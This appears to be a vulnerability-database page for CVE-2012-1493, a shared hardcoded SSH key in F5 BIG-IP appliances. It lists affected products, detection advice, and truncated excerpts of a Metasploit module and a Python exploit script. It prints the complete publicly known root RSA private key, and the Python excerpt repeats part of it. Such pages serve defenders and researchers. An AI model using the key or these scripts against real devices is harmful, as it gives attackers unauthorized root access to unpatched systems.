CVE-2012-1493
published 2012-07-09CVE-2012-1493: F5 BIG-IP appliances 9.x before 9.4.8-HF5, 10.x before 10.2.4, 11.0.x before 11.0.0-HF2, and 11.1.x before 11.1.0-HF3, and Enterprise Manager before 2.1.0-HF2…
PriorityP270high7.8CVSS 2.0
AVNACLAuNCCINAN
EXPLOIT
EPSS
63.08%
99.1th percentile
F5 BIG-IP appliances 9.x before 9.4.8-HF5, 10.x before 10.2.4, 11.0.x before 11.0.0-HF2, and 11.1.x before 11.1.0-HF3, and Enterprise Manager before 2.1.0-HF2, 2.2.x before 2.2.0-HF1, and 2.3.x before 2.3.0-HF3, use a single SSH private key across different customers' installations and do not properly restrict access to this key, which makes it easier for remote attackers to perform SSH logins via the PubkeyAuthentication option.
Affected
73 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| f5 | big-ip_application_security_manager | — | — |
| f5 | big-ip_application_security_manager | — | — |
| f5 | big-ip_application_security_manager | — | — |
| f5 | big-ip_application_security_manager | — | — |
| f5 | big-ip_application_security_manager | — | — |
| f5 | big-ip_application_security_manager | — | — |
| f5 | big-ip_application_security_manager | — | — |
| f5 | big-ip_application_security_manager | — | — |
| f5 | big-ip_application_security_manager | — | — |
| f5 | big-ip_application_security_manager | — | — |
| f5 | big-ip_application_security_manager | — | — |
| f5 | big-ip_global_traffic_manager | — | — |
| f5 | big-ip_global_traffic_manager | — | — |
| f5 | big-ip_global_traffic_manager | — | — |
| f5 | big-ip_global_traffic_manager | — | — |
| f5 | big-ip_global_traffic_manager | — | — |
| f5 | big-ip_global_traffic_manager | — | — |
| f5 | big-ip_local_traffic_manager | — | — |
| f5 | big-ip_local_traffic_manager | — | — |
| f5 | big-ip_local_traffic_manager | — | — |
| f5 | big-ip_local_traffic_manager | — | — |
| f5 | big-ip_local_traffic_manager | — | — |
| f5 | big-ip_local_traffic_manager | — | — |
| f5 | enterprise_manager | — | — |
| f5 | enterprise_manager | — | — |
Detection & IOCsextracted from sources · hover to see the quote
other-----BEGIN RSA PRIVATE KEY-----
MIICWgIBAAKBgQC8iELmyRPPHIeJ//uLLfKHG4rr84HXeGM+quySiCRgWtxbw4rh
UlP7n4XHvB3ixAKdWfys2pqHD/Hqx9w4wMj9e+fjIpTi3xOdh/YylRWvid3Pf0vk
OzWftKLWbay5Q3FZsq/nwjz40yGW3YhOtpK5NTQ0bKZY5zz4s2L4wdd0uQIBIwKB
gBWL6mOEsc6G6uszMrDSDRbBUbSQ26OYuuKXMPrNuwOynNdJjDcCGDoDmkK2adDF
8auVQXLXJ5poOOeh0AZ8br2vnk3hZd9mnF+uyDB3PO/tqpXOrpzSyuITy5LJZBBv
7r7kqhyBs0vuSdL/D+i1DHYf0nv2Ps4aspoBVumuQid7AkEA+tD3RDashPmoQJvM
2oWS7PO6ljUVXszuhHdUOaFtx60ZOg0OVwnh+NBbbszGpsOwwEE+OqrKMTZjYg3s
37+x/wJBAMBtwmoi05hBsA4Cvac66T1Vdhie8qf5dwL2PdHfu6hbOifSX/xSPnVL
RTbwU9+h/t6BOYdWA0xr0cWcjy1U6UcCQQDBfKF9w8bqPO+CTE2SoY6ZiNHEVNX4
rLf/ycShfIfjLcMA5YAXQiNZisow5xznC/1hHGM0kmF2a8kCf8VcJio5AkBi9p5/
uiOtY5xe+hhkofRLbce05AfEGeVvPM9V/gi8+7eCMa209xjOm70yMnRHIBys8gBU
Ot0f/O+KM0JR0+WvAkAskPvTXevY5wkp5mYXMBlUqEd7R3vGBV/qp4BldW5l0N4G
LesWvIh6+moTbFuPRoQnGO2P6D7Q5sPPqgqyefZS
-----END RSA PRIVATE KEY-----↗
otherssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAvIhC5skTzxyHif/7iy3yhxuK6/OB13hjPqrskogkYFrcW8OK4VJT+5+Fx7wd4sQCnVn8rNqahw/x6sfcOMDI/Xvn4yKU4t8TnYf2MpUVr4ndz39L5Ds1n7Si1m2suUNxWbKv58I8+NMhlt2ITraSuTU0NGymWOc8+LNi+MHXdLk= SCCP Superuser↗
- →Detect SSH authentication attempts using the known F5 BIG-IP hardcoded RSA public key fingerprint 71:3a:b0:18:e2:6c:41:18:4e:56:1e:fd:d2:49:97:66 on port 22. ↗
- →Alert on SSH logins to F5 BIG-IP devices as 'root' using publickey authentication (PubkeyAuthentication), especially from unexpected source IPs. ↗
- →Monitor for the presence or use of the known hardcoded RSA private key (MIICWgIBAAKBgQC8iELmyRPPHIeJ...) in SSH session negotiation or on disk. ↗
- →Look for the Metasploit module 'exploits/linux/ssh/f5_bigip_known_privkey' being used; it targets port 22 with auth_methods set to 'publickey' and spawns /bin/sh. ↗
- ·The hardcoded SSH key pair is present on all vulnerable BIG-IP appliances across all customer installations; the private key is publicly known and identical on every affected device. ↗
- ·Only BIG-IP platforms WITHOUT SCCP are affected; patched versions are 9.4.8-HF5+, 10.2.4+, 11.0.0-HF2+, 11.1.0-HF3+, and Enterprise Manager 2.1.0-HF2+, 2.2.0-HF1+, 2.3.0-HF3+. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
F5 BIG-IP - SSH Private Key Exposure (Metasploit)
exploitdb·2012-06-13
CVE-2012-1493 F5 BIG-IP - SSH Private Key Exposure (Metasploit)
F5 BIG-IP - SSH Private Key Exposure (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'net/ssh'
class Metasploit3 'F5 BIG-IP SSH Private Key Exposure',
'Version' => '$Revision$',
'Description' => %q{
F5 ships a public/private key pair on BIG-IP appliances that allows
passwordless authentication to any other BIG-IP box. Since the key is
easily retrievable, an attacker can use it to gain unauthorized remote
access as root.
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Privileged' => true,
'Targets' => [ [ "Universal", {} ] ],
'Payload' =>
{
'Compat' => {
'Paylo
Exploit-DB
F5 BIG-IP - Authentication Bypass
exploitdb·2012-06-12
CVE-2012-1493 F5 BIG-IP - Authentication Bypass
F5 BIG-IP - Authentication Bypass
---
#!/usr/bin/python
#
# Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability (py)
#
# Quick script written by Dave Kennedy (ReL1K) for F5 authentication root bypass
# http://www.secmaniac.com
#
#
import subprocess,os
filewrite = file("priv.key", "w")
filewrite.write("""-----BEGIN RSA PRIVATE KEY-----
MIICWgIBAAKBgQC8iELmyRPPHIeJ//uLLfKHG4rr84HXeGM+quySiCRgWtxbw4rh
UlP7n4XHvB3ixAKdWfys2pqHD/Hqx9w4wMj9e+fjIpTi3xOdh/YylRWvid3Pf0vk
OzWftKLWbay5Q3FZsq/nwjz40yGW3YhOtpK5NTQ0bKZY5zz4s2L4wdd0uQIBIwKB
gBWL6mOEsc6G6uszMrDSDRbBUbSQ26OYuuKXMPrNuwOynNdJjDcCGDoDmkK2adDF
8auVQXLXJ5poOOeh0AZ8br2vnk3hZd9mnF+uyDB3PO/tqpXOrpzSyuITy5LJZBBv
7r7kqhyBs0vuSdL/D+i1DHYf0nv2Ps4aspoBVumuQid7AkEA+tD3RDashPmoQJvM
2oWS7PO6ljUVXszuhHdUOaFtx60ZOg0OVwnh+NBbbszGpsOwwEE+OqrKM
Exploit-DB
F5 BIG-IP - Authentication Bypass (PoC)
exploitdb·2012-06-11·CVSS 7.8
CVE-2012-1493 [HIGH] F5 BIG-IP - Authentication Bypass (PoC)
F5 BIG-IP - Authentication Bypass (PoC)
---
Matta Consulting - Matta Advisory
https://www.trustmatta.com
F5 BIG-IP remote root authentication bypass Vulnerability
Advisory ID: MATTA-2012-002
CVE reference: CVE-2012-1493
Affected platforms: BIG-IP platforms without SCCP
Version: 11.x 10.x 9.x
Date: 2012-February-16
Security risk: High
Vulnerability: F5 BIG-IP remote root authentication bypass
Researcher: Florent Daigniere
Vendor Status: Notified / Patch available
Vulnerability Disclosure Policy:
https://www.trustmatta.com/advisories/matta-disclosure-policy-01.txt
Permanent URL:
https://www.trustmatta.com/advisories/MATTA-2012-002.txt
Description:
Vulnerable BIG-IP installations allow unauthenticated users to bypass
authentication and login as the 'root' user on the device.
The SSH pr
Metasploit
F5 BIG-IP SSH Private Key Exposure
metasploit
F5 BIG-IP SSH Private Key Exposure
F5 BIG-IP SSH Private Key Exposure
F5 ships a public/private key pair on BIG-IP appliances that allows passwordless authentication to any other BIG-IP box. Since the key is easily retrievable, an attacker can use it to gain unauthorized remote access as root.
No writeups or analysis indexed.
http://support.f5.com/kb/en-us/solutions/public/13000/600/sol13600.htmlhttp://www.theregister.co.uk/2012/06/13/f5_kit_metasploit_exploit/https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/ssh/f5_bigip_known_privkey.rbhttps://www.trustmatta.com/advisories/MATTA-2012-002.txthttp://support.f5.com/kb/en-us/solutions/public/13000/600/sol13600.htmlhttp://www.theregister.co.uk/2012/06/13/f5_kit_metasploit_exploit/https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/ssh/f5_bigip_known_privkey.rbhttps://www.trustmatta.com/advisories/MATTA-2012-002.txt
2012-07-09
Published